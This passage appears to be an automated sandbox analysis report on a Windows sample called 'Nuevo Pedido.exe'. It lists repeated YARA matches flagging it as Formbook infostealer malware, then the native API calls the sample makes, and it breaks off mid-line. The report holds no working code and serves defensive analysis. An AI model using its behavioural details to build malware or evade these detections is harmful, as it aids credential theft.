Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: Nuevo Pedido.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
            Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: String function: 019BB150 appears 35 times
            Source: C:\Windows\SysWOW64\cscript.exe; Code function: String function: 0477B150 appears 35 times
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_004185E0 NtCreateFile
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_00418690 NtReadFile
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_00418710 NtClose
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_004187C0 NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_004185DA NtCreateFile
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_0041870C NtReadFile, NtClose
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_004187BA NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_019F99A0 NtCreateSection, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_019F9910 NtAdjustPrivilegesToken, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_019F98F0 NtReadVirtualMemory, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_019F9840 NtDelayExecution, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_019F9860 NtQuerySystemInformation, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_019F9A00 NtProtectVirtualMemory, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_019F9A20 NtResumeThread, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_019F9A50 NtCreateFile, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_019F95D0 NtClose, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_019F9540 NtReadFile, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_019F9780 NtMapViewOfSection, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_019F97A0 NtUnmapViewOfSection, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_019F9FE0 NtCreateMutant, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_019F9710 NtQueryInformationToken, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_019F96E0 NtFreeVirtualMemory, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_019F9660 NtAllocateVirtualMemory, LdrInitializeThunk
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_019F99D0 NtCreateProcessEx
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_019F9950 NtQueueApcThread
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode func